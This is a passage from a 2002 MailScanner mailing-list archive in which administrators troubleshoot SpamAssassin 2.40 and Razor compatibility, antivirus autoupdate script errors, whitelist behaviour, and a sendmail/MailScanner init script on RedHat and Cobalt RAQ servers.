flags are raised.. when I have some more time going to have to try running it in debug mode on a test server and see if I can spot what's causing the problem.. Was just curious if anyone else here's tried it yet. Derek From brose at MED.WAYNE.EDU Wed Sep 4 15:24:18 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:29 2006 Subject: Mailscanner and SA 2.40 Message-ID: I've been using 2.40 for quite awhile and just updated from the cvs to release last night. I'm not seeing any problems. Are you checking every message and adding the score for even non-spam? If you use razor and this option then it takes a lot longer to clear your queues. Adding the score to every message was nice but I got tired of the incoming queue backing up. So it was either it or razor. So turn one or the other off and you should see a difference. -----Original Message----- From: Derek Buttineau [mailto:derek@csolve.net] Sent: Wednesday, September 04, 2002 9:43 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Mailscanner and SA 2.40 Anyone else tried this combination yet? In my testing 2.40 seems to cause issue with Mailscanner operation.. though 2.31 works perfectly fine.. It seems with 2.40 in place a lot of mail never makes it from the inbound queue to the outbound queue, though no error flags are raised.. when I have some more time going to have to try running it in debug mode on a test server and see if I can spot what's causing the problem.. Was just curious if anyone else here's tried it yet. Derek From erich at OLYPEN.COM Wed Sep 4 16:23:16 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:29 2006 Subject: Mailscanner and SA 2.40 In-Reply-To: <00ea01c25418$f52bec80$8850a4cf@derek> Message-ID: On Wed, 4 Sep 2002, Derek Buttineau wrote: > Anyone else tried this combination yet? I just tried it yesterday. Basicly, the whole thing just fell apart and quit working and I had to revert back to just plain vanilla sendmail. However, I wouldn't be justified in jumping to any conclusions and pointing any fingers because there are some other problems with my test platform like rpm is hosed and its database corrupt or something, at any rate rpm -qa and rpm --rebuilddb are dumping core. Also, being a relative newbie to mailscanner and SpamAssassin I'm probably not doing things right anyway. Platform is a RedHat 6.2 box, running Sendmail 8.12.5 and I installed mailscanner-3.22-12.i386.rpm with rpm -i. It had been running for almost a week now and I was quite impressed with the accuracy of spam identification and virus removal, though I noticed that certain types of "teen girl" spam was scoring just below the 5 threshold. Now, this might not be the correct way to upgrade SpamAssassin, but I grabbed the Mail-SpamAssassin-2.40.tar.gz tarball and did the perl Makefile.PL; make;make install routine and promptly got hosed. So, I'm curious whether most folks use the mailscanner rpm to install or if they use the MailScanner-3.22-12.tar.gz tarball and build and install manually? I had initially started working with the tarball but had a devil of a time figuring out where everything was supposed to go, it seems the INSTALL docs are out of date. I really don't like depending on rpms for anything I consider a critical component on a production platform for a number of reasons both philosophical and practical. Don't get me wrong, the rpm install is a great thing, in fact nothing short of amazing, but it does depend on other things (like rpm actually working) and the more dependencies you have the less suitable it is for production, it just means there are more things that can go wrong. Best Regards, Eric From sevans at FOUNDATION.SDSU.EDU Wed Sep 4 17:11:51 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:29 2006 Subject: Mailscanner and SA 2.40 Message-ID: <6214C3F9233D764C9E7029396C35501533143A@mail.foundation.sdsu.edu> Redhat 7.2, MS 3.22-12, SA 2.40, everything working fine in test environment. However there's a few problems with 2.40 (epically using razor 2), and there's talk about 2.41 coming out in the next few days. I'm planning on waiting a few weeks to let things settle down. Steve Evans (619) 594-0653 -----Original Message----- From: Eric H [mailto:erich@OLYPEN.COM] Sent: Wednesday, September 04, 2002 8:23 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Mailscanner and SA 2.40 On Wed, 4 Sep 2002, Derek Buttineau wrote: > Anyone else tried this combination yet? I just tried it yesterday. Basicly, the whole thing just fell apart and quit working and I had to revert back to just plain vanilla sendmail. However, I wouldn't be justified in jumping to any conclusions and pointing any fingers because there are some other problems with my test platform like rpm is hosed and its database corrupt or something, at any rate rpm -qa and rpm --rebuilddb are dumping core. Also, being a relative newbie to mailscanner and SpamAssassin I'm probably not doing things right anyway. Platform is a RedHat 6.2 box, running Sendmail 8.12.5 and I installed mailscanner-3.22-12.i386.rpm with rpm -i. It had been running for almost a week now and I was quite impressed with the accuracy of spam identification and virus removal, though I noticed that certain types of "teen girl" spam was scoring just below the 5 threshold. Now, this might not be the correct way to upgrade SpamAssassin, but I grabbed the Mail-SpamAssassin-2.40.tar.gz tarball and did the perl Makefile.PL; make;make install routine and promptly got hosed. So, I'm curious whether most folks use the mailscanner rpm to install or if they use the MailScanner-3.22-12.tar.gz tarball and build and install manually? I had initially started working with the tarball but had a devil of a time figuring out where everything was supposed to go, it seems the INSTALL docs are out of date. I really don't like depending on rpms for anything I consider a critical component on a production platform for a number of reasons both philosophical and practical. Don't get me wrong, the rpm install is a great thing, in fact nothing short of amazing, but it does depend on other things (like rpm actually working) and the more dependencies you have the less suitable it is for production, it just means there are more things that can go wrong. Best Regards, Eric From mkettler at EVI-INC.COM Wed Sep 4 19:13:54 2002 From: mkettler at EVI-INC.COM (Matt Kettler) Date: Thu Jan 12 21:15:29 2006 Subject: Feature request! In-Reply-To: Message-ID: <5.1.0.14.0.20020904140944.015cb968@192.168.50.2> As a side-note, the spamassasin team is already working on adding a Bayesian filter to SA. But that probably won't happen till 2.5x at least. http://www.hughes-family.org/bugzilla/show_bug.cgi?id=813 of course, the added mailscanner API would be great for adding on all kinds of other filters too :) At 10:24 AM 9/4/2002 +0100, Quentin wrote: >The ability to chose an A-V product from a largish range and use that >with MailScanner is good. Even better is the ability to run two or more >of those A-V products in "series" (we do this using Sophos & McAfee). > >I would like to do something similar with the anti-spam tool. At present >only SpamAssassin seems to be on offer. It would be nice if there was a >well defined API offered by MailScanner that allowed alternative >anti-spam products or home-grown software to be used. Even better if two >or more anti-spam packages can be run in "series". > >The motivation for this request is to be able to experiment with some >home-written anti-spam software, for example, a Bayesian filter (see >http://www.paulgraham.com/spam.html). > >Quentin >--- >PHONE: +44 191 222 8209 Computing Service, University of Newcastle >FAX: +44 191 222 8765 Newcastle upon Tyne, United Kingdom, NE1 7RU. >------------------------------------------------------------------------ >"Any opinion expressed above is mine. The University can get its own." From erich at OLYPEN.COM Wed Sep 4 19:20:54 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:29 2006 Subject: Mailscanner and SA 2.40 In-Reply-To: Message-ID: On Wed, 4 Sep 2002, Eric H wrote: > On Wed, 4 Sep 2002, Derek Buttineau wrote: > > > Anyone else tried this combination yet? > > I just tried it yesterday. Basicly, the whole thing just fell apart and > quit working and I had to revert back to just plain vanilla sendmail. Hmm, I just reverted back to SpamAssassin version 2.31 (installed from CPAN) and then checked out all of the other required perl modules. Everything reported "up to date" except for MailTools and after I did "install M/MA/MARKOV/MailTools-1.49.tar.gz" I was able to fire up mailscanner again and it appears to be working again. Best Regards, Eric From craig at WEBFARM.CO.NZ Thu Sep 5 05:17:25 2002 From: craig at WEBFARM.CO.NZ (Craig St George) Date: Thu Jan 12 21:15:29 2006 Subject: A couple of questions In-Reply-To: <5.1.0.14.2.20020904072843.03a03ea0@imap.ecs.soton.ac.uk> References: <00ab01c253a1$60965460$370410ac@ns.uu.net> Message-ID: <5.1.0.14.2.20020905161335.03ef1680@192.168.0.88> When does it use the Deleted Virus Message Report and Deleted Bad Filename reports ? when virus scanning ? I have tried Deliver To Recipients = no and also Action = delete so I m confused ? From LISTSERV at JISCMAIL.AC.UK Thu Sep 5 07:48:31 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:29 2006 Subject: MAILSCANNER: p.vanbrouwershaven@NETWORKING4ALL.COM requested to join Message-ID: <200209050648.HAA10245@magpie.ecs.soton.ac.uk> Thu, 5 Sep 2002 07:48:31 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Paul van Brouwershaven . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER p.vanbrouwershaven@NETWORKING4ALL.COM Paul van Brouwershaven The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+p.vanbrouwershaven%40NETWORKING4ALL.COM+Paul+van+Brouwershaven&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From paul at VANBROUWERSHAVEN.COM Thu Sep 5 08:46:53 2002 From: paul at VANBROUWERSHAVEN.COM (paul@VANBROUWERSHAVEN.COM) Date: Thu Jan 12 21:15:29 2006 Subject: No subject Message-ID: Hi, I'm using Mailscanner on my server and want to log witch and when a virus is founded on my server. Does anyone now a way how I can put this information to MRTG, RRDTOOL ore a MySQL database? The information I want: - DATE-TIME - NAME OF THE VIRUS VIRUS - SEND / RECEIVE Regards, Paul van Brouwershaven From mailscanner at ecs.soton.ac.uk Thu Sep 5 09:27:57 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:29 2006 Subject: No subject In-Reply-To: Message-ID: <5.1.0.14.2.20020905092653.05f4e2a0@imap.ecs.soton.ac.uk> All this information is sent to the "Local Postmaster" address. So using procmail or filter to process "Local Postmaster"s mail, you can put all of these notifications into one folder, and then easily process them from there with a script. Sorry I haven't got time to write the script for you too... At 08:46 05/09/2002, you wrote: >Hi, > >I'm using Mailscanner on my server and want to log witch and when a >virus is founded on my server. > >Does anyone now a way how I can put this information to MRTG, RRDTOOL >ore a MySQL database? > >The information I want: > - DATE-TIME > - NAME OF THE VIRUS VIRUS > - SEND / RECEIVE > > >Regards, > >Paul van Brouwershaven -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 5 09:26:33 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:29 2006 Subject: A couple of questions In-Reply-To: <5.1.0.14.2.20020905161335.03ef1680@192.168.0.88> References: <5.1.0.14.2.20020904072843.03a03ea0@imap.ecs.soton.ac.uk> <00ab01c253a1$60965460$370410ac@ns.uu.net> Message-ID: <5.1.0.14.2.20020905091944.05bb3768@imap.ecs.soton.ac.uk> At 05:17 05/09/2002, you wrote: >When does it use the >Deleted Virus Message Report >and >Deleted Bad Filename reports ? >when virus scanning ? If an attachment fails the filename checking, and the attachment is not being saved to disk (i.e. "Action = delete", then the badly-named attachment will be replaced by the "Delete Bad Filename Report". If an attachment fails the virus checking, and the attachment is not being saved to disk (i.e. "Action = delete", then the badly-named attachment will be replaced by the "Delete Virus Report". >Deliver To Recipients = no That stops the cleaned up messages being delivered to the recipient. >Action = delete That controls what happens to infected/badly-named attachments. If set to "delete" then the original attachments are thrown away, and the "Delete * Message Report" will replace the original attachment. If set to "store" or "keep" then the original attachments are saved in the quarantine, and the "Stored * Message Report" will replace the original attachment. Hope that helps explain it... -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From iah at DMU.AC.UK Thu Sep 5 09:37:44 2002 From: iah at DMU.AC.UK (Andy Humberston) Date: Thu Jan 12 21:15:29 2006 Subject: SpamAssassin 2.31 and Razor 2.14 Message-ID: Hi, I apologise if this is slightly off topic, but I am trying to configure SpamAssassin along with Razor. Whenever I run make test for SA I get a message telling me that Razor is not installed, yet it is. Has anyone else experienced this? Andy Humberston Team Leader - Server Support Team Information Services and Systems De Montfort University HelpDesk: 0116 250 6050 Fax: 0116 257 7658 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020905/54addc69/attachment.html From s.zeisler at MINDLAB.DE Thu Sep 5 10:05:54 2002 From: s.zeisler at MINDLAB.DE (Stephan Zeisler) Date: Thu Jan 12 21:15:29 2006 Subject: mcafee autoupdate skript Message-ID: Hello all! I get an error when executing the MailScanner mcafee update skript (autoupdate). The error is: "McAfee update failed: cannot find the update file, at ./autoupdate line 93." I checked the name of the available updatefile at: ftp.nai.com/pub/antivirus/datfiles/4.x/ it`s: "dat-4221.tar" The script is looking for an file described by this line: " if ($file =~ /dat-.*\.tar/){" know I? m unsure whether the expression is wrong or if how to alter it. Thanks for any ideas. -- Stephan Zeisler _____________________________________________ MINDLAB GmbH Marktplatz 19 73728 Esslingen (Neckar) GERMANY Tel.: +49-(0)-711-36550-105 Fax.: +49-(0)-711-36550-555 e-mail: stephan.zeisler@mindlab.de Internet: http://www.mindlab.de http://mindlab-webmining.com _____________________________________________ MINDLAB --- access your knowledge From email at ace.net.au Thu Sep 5 09:57:40 2002 From: email at ace.net.au (Peter Nitschke) Date: Thu Jan 12 21:15:29 2006 Subject: Whitelist problem In-Reply-To: <5.1.0.14.2.20020905091944.05bb3768@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020904072843.03a03ea0@imap.ecs.soton.ac.uk> <00ab01c253a1$60965460$370410ac@ns.uu.net> <5.1.0.14.2.20020905091944.05bb3768@imap.ecs.soton.ac.uk> Message-ID: <200209051827400860.07BA1263@smtp1.ace.net.au> Hi, Running MS-3.22-12 with SpamAss 2.31.2 I added "From: newscomment@newsjpmsn.com" to spam.whitelist.conf yet the following header still gets caught as spam. It happens with some others also, what am I doing wrong? Peter ---------- $_smtp5.melma.com [203.174.71.94] $rSMTP $ssmtp5.melma.com ${daemon_flags} ${if_addr}203.87.115.13 S RPFD: H?P?Return-Path: H??Received: from smtp5.melma.com (smtp5.melma.com [203.174.71.94]) by dns4.ace.net.au (8.11.6/8.11.6) with SMTP id g858eaC27343 for ; Thu, 5 Sep 2002 18:10:37 +0930 H??Received: (qmail 69623 invoked by uid 0); 5 Sep 2002 17:36:25 +0900 H??Received: from unknown (HELO send2.data-hotel.net) (10.0.15.164) by 0 with SMTP; 5 Sep 2002 17:36:25 +0900 H??Date: Thu, 5 Sep 2002 17:35:52 +0900 H??From: MSN JOURNAL H??To: user@ace.net.au H??Subject: [MSN =?ISO-2022-JP?B?GyRCJTglYyE8JUolaxsoQg==?= SELECT 2002.09.05] H??Mime-Version: 1.0 H??Message-Id: <190.64086.send2@melma.com> H??Content-Type: text/plain; charset=iso-2022-jp H??Content-Transfer-Encoding: 7bit H??X-MagazineID: melma.com magazine 394 H??X-Mailer: melma.com 3.1 H??Errors-To: magusererror-394-user=ace.net.au@mailerror.melma.com . From craig at WEBFARM.CO.NZ Thu Sep 5 10:38:41 2002 From: craig at WEBFARM.CO.NZ (craig) Date: Thu Jan 12 21:15:29 2006 Subject: A couple of questions In-Reply-To: <5.1.0.14.2.20020905091944.05bb3768@imap.ecs.soton.ac.uk> Message-ID: > >When does it use the > >Deleted Virus Message Report > >and > >Deleted Bad Filename reports ? > >when virus scanning ? > > If an attachment fails the filename checking, and the attachment is not > being saved to disk (i.e. "Action = delete", then the badly-named > attachment will be replaced by the "Delete Bad Filename Report". Thnaks for that I found the problem I m using this on cobalt raq and seems that the init script does not kill mailscanner when you do a stop or restart it does that to sendmail process so this is why when I did the chnages to mailscanner.conf they did not show up I will check out that init script and find out why and let Mr Bassi know if its a bug From chris at HARVESTROAD.COM Thu Sep 5 10:41:44 2002 From: chris at HARVESTROAD.COM (Chris Waltham) Date: Thu Jan 12 21:15:29 2006 Subject: Sophos autoupdate failing on install Message-ID: <5.1.0.14.2.20020905174006.02d55730@mail.harvestroad.com> Hi guys, I'm having a few dramas getting Sophos' autoupdate to run when I'm installing it. I've checked the directory names specified in the autoupdate script, but to no avail. When I run the autoupdate file by hand, I get this (it's the same error as upon the initial install): root@xxx:/usr/local/sophos/bin# ./autoupdate Lynx failed with error return 1 , Bad file descriptor at ./autoupdate line 77. Any ideas? thanks again, Chris From smohan at VSNL.COM Thu Sep 5 12:09:55 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:29 2006 Subject: Sophos autoupdate failing on install In-Reply-To: <5.1.0.14.2.20020905174006.02d55730@mail.harvestroad.com> Message-ID: I had the same problem. I deleted /usr/local/Sophos directory and ran /usr/local/MailScanner/Sophos.install from the directory where the tar.gz file from Sophos was downloaded. This is install script installs Sophos in the right location and also runs the autoupdate which goes thro' fine. Thought I've not looked at the reasons due to lack of time, I know it works. I also know that if I install Sophos where it is supposed to be installed by hand, autoupdate fails in line 77. HTH Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Chris Waltham Sent: 05 September 2002 15:12 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Sophos autoupdate failing on install Hi guys, I'm having a few dramas getting Sophos' autoupdate to run when I'm installing it. I've checked the directory names specified in the autoupdate script, but to no avail. When I run the autoupdate file by hand, I get this (it's the same error as upon the initial install): root@xxx:/usr/local/sophos/bin# ./autoupdate Lynx failed with error return 1 , Bad file descriptor at ./autoupdate line 77. Any ideas? thanks again, Chris From iah at DMU.AC.UK Thu Sep 5 12:19:02 2002 From: iah at DMU.AC.UK (Andy Humberston) Date: Thu Jan 12 21:15:29 2006 Subject: SpamAssassin 2.31 and Razor 2.14 Message-ID: <200209051120.g85BKSr21212@ori.rl.ac.uk> I think I have solved this, SA only currently detects Razor1. Razor2 detectection has been developed, but as yet hasn't been released. I have installed Razor-1.20 Andy From mike at CAMAROSS.NET Thu Sep 5 12:53:50 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:29 2006 Subject: A couple of questions In-Reply-To: Message-ID: <005201c254d2$e79e1ec0$6501a8c0@mikedesk> One of the machines I have MS installed on is a RAQ too and I also had the problem of the init script not killing the mailscanner process. I had to modify the init script to kill 'perl' instead of 'mailscanner'. Luckily, I don't have any other perl processes running on that box :) I know it's not a clean fix, but it works. Below is the stop section from my init script. stop) # Stop daemons. echo 'Shutting down MailScanner daemons:' echo -n ' MailScanner: ' killproc perl echo echo -n ' incoming sendmail: ' killproc sendmail 2>/dev/null echo echo -n ' outgoing sendmail: ' killproc /usr/sbin/sendmail 2>/dev/null RETVAL=$? echo [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/mailscanner ;; Mike -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of craig Sent: Thursday, September 05, 2002 4:39 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: A couple of questions > >When does it use the > >Deleted Virus Message Report > >and > >Deleted Bad Filename reports ? > >when virus scanning ? > > If an attachment fails the filename checking, and the attachment is > not being saved to disk (i.e. "Action = delete", then the badly-named > attachment will be replaced by the "Delete Bad Filename Report". Thnaks for that I found the problem I m using this on cobalt raq and seems that the init script does not kill mailscanner when you do a stop or restart it does that to sendmail process so this is why when I did the chnages to mailscanner.conf they did not show up I will check out that init script and find out why and let Mr Bassi know if its a bug From paul at VANBROUWERSHAVEN.COM Thu Sep 5 13:04:46 2002 From: paul at VANBROUWERSHAVEN.COM (paul@VANBROUWERSHAVEN.COM) Date: Thu Jan 12 21:15:29 2006 Subject: A couple of questions In-Reply-To: <005201c254d2$e79e1ec0$6501a8c0@mikedesk> Message-ID: I use the following script it works ok: #!/bin/sh # # mailscanner This shell script takes care of starting and stopping # MailScanner, and its associated copies of sendmail. # # chkconfig: 2345 80 30 # description: MailScanner is an open-source E-Mail Gateway Virus Scanner. # processname: mailscanner # config: /usr/local/MailScanner/etc/mailscanner.conf # pidfile: /usr/local/MailScanner/var/virus.pid # Source function library. . /etc/rc.d/init.d/functions # Source networking configuration. . /etc/sysconfig/network # Source mailscanner configureation. if [ -f /etc/sysconfig/mailscanner ] ; then . /etc/sysconfig/mailscanner else QUEUETIME=15m fi # Check that networking is up. [ ${NETWORKING} = "no" ] && exit 0 [ -f /usr/local/MailScanner/bin/check_mailscanner ] || exit 0 [ -f /usr/sbin/sendmail ] || exit 0 RETVAL=0 # See how we were called. case "$1" in start) # Start daemons. echo 'Starting MailScanner daemons:' /usr/bin/newaliases > /dev/null 2>&1 if test -x /usr/bin/make -a -f /etc/mail/Makefile ; then make -C /etc/mail -q else for i in virtusertable access domaintable mailertable ; do if [ -f /etc/mail/$i ] ; then makemap hash /etc/mail/$i < /etc/mail/$i fi done fi echo -n ' incoming sendmail: ' /usr/sbin/sendmail -bd -ODeliveryMode=queueonly \ -OQueueDirectory=/var/spool/mqueue.in success echo echo -n ' outgoing sendmail: ' /usr/sbin/sendmail $([ -n "$QUEUETIME" ] && echo -q$QUEUETIME) success echo echo -n ' MailScanner: ' /usr/local/MailScanner/bin/check_mailscanner >/dev/null RETVAL=$? [ $RETVAL -eq 0 ] && touch /var/lock/subsys/mailscanner success echo ;; stop) # Stop daemons. echo 'Shutting down MailScanner daemons:' echo -n ' MailScanner: ' killproc mailscanner echo echo -n ' incoming sendmail: ' killproc sendmail 2>/dev/null echo echo -n ' outgoing sendmail: ' killproc /usr/sbin/sendmail 2>/dev/null RETVAL=$? echo [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/mailscanner ;; status) # Work out if all of MailScanner is running echo 'Checking MailScanner daemons:' echo -n ' MailScanner: ' pid=`pidofproc mailscanner` if [ -z "$pid" ] ; then failure; else success; fi echo # Now the incoming sendmail echo -n ' incoming sendmail: ' pid=`ps ax | grep 'sendmai[l]: accepting connections'` if [ -z "$pid" ] ; then failure; else success; fi echo # Now the outgoing sendmail echo -n ' outgoing sendmail: ' # More complex regexp to handle other RedHats pid=`ps ax | egrep '\[sendmail\]|sendmai[l] -q[0-9]*[mhd]'` if [ -z "$pid" ] ; then failure; else success; fi echo ;; restart|reload) $0 stop sleep 2 $0 start RETVAL=$? ;; *) echo "Usage: mailscanner {start|stop|status|restart}" exit 1 esac Paul van Brouwershaven > -----Original Message----- > From: MailScanner mailing list > [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Mike Kercher > Sent: Thursday, September 05, 2002 1:54 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: A couple of questions > > > One of the machines I have MS installed on is a RAQ too and I also had > the problem of the init script not killing the mailscanner process. I > had to modify the init script to kill 'perl' instead of 'mailscanner'. > Luckily, I don't have any other perl processes running on > that box :) I > know it's not a clean fix, but it works. Below is the stop > section from > my init script. > > stop) > # Stop daemons. > echo 'Shutting down MailScanner daemons:' > echo -n ' MailScanner: ' > killproc perl > echo > echo -n ' incoming sendmail: ' > killproc sendmail 2>/dev/null > echo > echo -n ' outgoing sendmail: ' > killproc /usr/sbin/sendmail 2>/dev/null > RETVAL=$? > echo > [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/mailscanner > ;; > > Mike > > > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > Behalf Of craig > Sent: Thursday, September 05, 2002 4:39 AM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: A couple of questions > > > > >When does it use the > > >Deleted Virus Message Report > > >and > > >Deleted Bad Filename reports ? > > >when virus scanning ? > > > > If an attachment fails the filename checking, and the attachment is > > not being saved to disk (i.e. "Action = delete", then the > badly-named > > attachment will be replaced by the "Delete Bad Filename Report". > > Thnaks for that I found the problem I m using this on cobalt raq and > seems that the init script does not kill mailscanner when you > do a stop > or restart it does that to sendmail process so this is why when I did > the chnages to mailscanner.conf they did not show up > > I will check out that init script and find out why and let Mr > Bassi know > if its a bug > From mike at CAMAROSS.NET Thu Sep 5 13:18:27 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:29 2006 Subject: A couple of questions In-Reply-To: Message-ID: <005301c254d6$570e88a0$6501a8c0@mikedesk> Is your machine a RAQ? The stock script works fine on all of my Redhat boxes, but the RAQ is a little different. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of paul@VANBROUWERSHAVEN.COM Sent: Thursday, September 05, 2002 7:05 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: A couple of questions I use the following script it works ok: #!/bin/sh # # mailscanner This shell script takes care of starting and stopping # MailScanner, and its associated copies of sendmail. # # chkconfig: 2345 80 30 # description: MailScanner is an open-source E-Mail Gateway Virus Scanner. # processname: mailscanner # config: /usr/local/MailScanner/etc/mailscanner.conf # pidfile: /usr/local/MailScanner/var/virus.pid # Source function library. . /etc/rc.d/init.d/functions # Source networking configuration. . /etc/sysconfig/network # Source mailscanner configureation. if [ -f /etc/sysconfig/mailscanner ] ; then . /etc/sysconfig/mailscanner else QUEUETIME=15m fi # Check that networking is up. [ ${NETWORKING} = "no" ] && exit 0 [ -f /usr/local/MailScanner/bin/check_mailscanner ] || exit 0 [ -f /usr/sbin/sendmail ] || exit 0 RETVAL=0 # See how we were called. case "$1" in start) # Start daemons. echo 'Starting MailScanner daemons:' /usr/bin/newaliases > /dev/null 2>&1 if test -x /usr/bin/make -a -f /etc/mail/Makefile ; then make -C /etc/mail -q else for i in virtusertable access domaintable mailertable ; do if [ -f /etc/mail/$i ] ; then makemap hash /etc/mail/$i < /etc/mail/$i fi done fi echo -n ' incoming sendmail: ' /usr/sbin/sendmail -bd -ODeliveryMode=queueonly \ -OQueueDirectory=/var/spool/mqueue.in success echo echo -n ' outgoing sendmail: ' /usr/sbin/sendmail $([ -n "$QUEUETIME" ] && echo -q$QUEUETIME) success echo echo -n ' MailScanner: ' /usr/local/MailScanner/bin/check_mailscanner >/dev/null RETVAL=$? [ $RETVAL -eq 0 ] && touch /var/lock/subsys/mailscanner success echo ;; stop) # Stop daemons. echo 'Shutting down MailScanner daemons:' echo -n ' MailScanner: ' killproc mailscanner echo echo -n ' incoming sendmail: ' killproc sendmail 2>/dev/null echo echo -n ' outgoing sendmail: ' killproc /usr/sbin/sendmail 2>/dev/null RETVAL=$? echo [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/mailscanner ;; status) # Work out if all of MailScanner is running echo 'Checking MailScanner daemons:' echo -n ' MailScanner: ' pid=`pidofproc mailscanner` if [ -z "$pid" ] ; then failure; else success; fi echo # Now the incoming sendmail echo -n ' incoming sendmail: ' pid=`ps ax | grep 'sendmai[l]: accepting connections'` if [ -z "$pid" ] ; then failure; else success; fi echo # Now the outgoing sendmail echo -n ' outgoing sendmail: ' # More complex regexp to handle other RedHats pid=`ps ax | egrep '\[sendmail\]|sendmai[l] -q[0-9]*[mhd]'` if [ -z "$pid" ] ; then failure; else success; fi echo ;; restart|reload) $0 stop sleep 2 $0 start RETVAL=$? ;; *) echo "Usage: mailscanner {start|stop|status|restart}" exit 1 esac Paul van Brouwershaven > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > Behalf Of Mike Kercher > Sent: Thursday, September 05, 2002 1:54 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: A couple of questions > > > One of the machines I have MS installed on is a RAQ too and I also had > the problem of the init script not killing the mailscanner process. I > had to modify the init script to kill 'perl' instead of 'mailscanner'. > Luckily, I don't have any other perl processes running on that box :) > I know it's not a clean fix, but it works. Below is the stop > section from > my init script. > > stop) > # Stop daemons. > echo 'Shutting down MailScanner daemons:' > echo -n ' MailScanner: ' > killproc perl > echo > echo -n ' incoming sendmail: ' > killproc sendmail 2>/dev/null > echo > echo -n ' outgoing sendmail: ' > killproc /usr/sbin/sendmail 2>/dev/null > RETVAL=$? > echo > [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/mailscanner > ;; > > Mike > > > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > Behalf Of craig > Sent: Thursday, September 05, 2002 4:39 AM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: A couple of questions > > > > >When does it use the > > >Deleted Virus Message Report > > >and > > >Deleted Bad Filename reports ? > > >when virus scanning ? > > > > If an attachment fails the filename checking, and the attachment is > > not being saved to disk (i.e. "Action = delete", then the > badly-named > > attachment will be replaced by the "Delete Bad Filename Report". > > Thnaks for that I found the problem I m using this on cobalt raq and > seems that the init script does not kill mailscanner when you do a > stop or restart it does that to sendmail process so this is why when I > did the chnages to mailscanner.conf they did not show up > > I will check out that init script and find out why and let Mr Bassi > know if its a bug > From p.vanbrouwershaven at NETWORKING4ALL.COM Thu Sep 5 13:26:28 2002 From: p.vanbrouwershaven at NETWORKING4ALL.COM (Paul van Brouwershaven - Networking4all) Date: Thu Jan 12 21:15:29 2006 Subject: A couple of questions In-Reply-To: <005301c254d6$570e88a0$6501a8c0@mikedesk> Message-ID: No sorry, this script is working on Redhat Paul van Brouwershaven Web application developer / Network engineer _____________________________ Phone: (31) 164 262295 Fax: (31) 164 262983 Email: p.vanbrouwershaven@networking4all.com Internet: http://www.networking4all.com > -----Original Message----- > From: MailScanner mailing list > [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Mike Kercher > Sent: Thursday, September 05, 2002 2:18 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: A couple of questions > > > Is your machine a RAQ? The stock script works fine on all of > my Redhat > boxes, but the RAQ is a little different. > > > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > Behalf Of paul@VANBROUWERSHAVEN.COM > Sent: Thursday, September 05, 2002 7:05 AM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: A couple of questions > > > I use the following script it works ok: > > > #!/bin/sh > # > # mailscanner This shell script takes care of starting and stopping > # MailScanner, and its associated copies of sendmail. > # > # chkconfig: 2345 80 30 > # description: MailScanner is an open-source E-Mail Gateway Virus > Scanner. # processname: mailscanner # config: > /usr/local/MailScanner/etc/mailscanner.conf > # pidfile: /usr/local/MailScanner/var/virus.pid > > # Source function library. > . /etc/rc.d/init.d/functions > > # Source networking configuration. > . /etc/sysconfig/network > > # Source mailscanner configureation. > if [ -f /etc/sysconfig/mailscanner ] ; then > . /etc/sysconfig/mailscanner > else > QUEUETIME=15m > fi > > 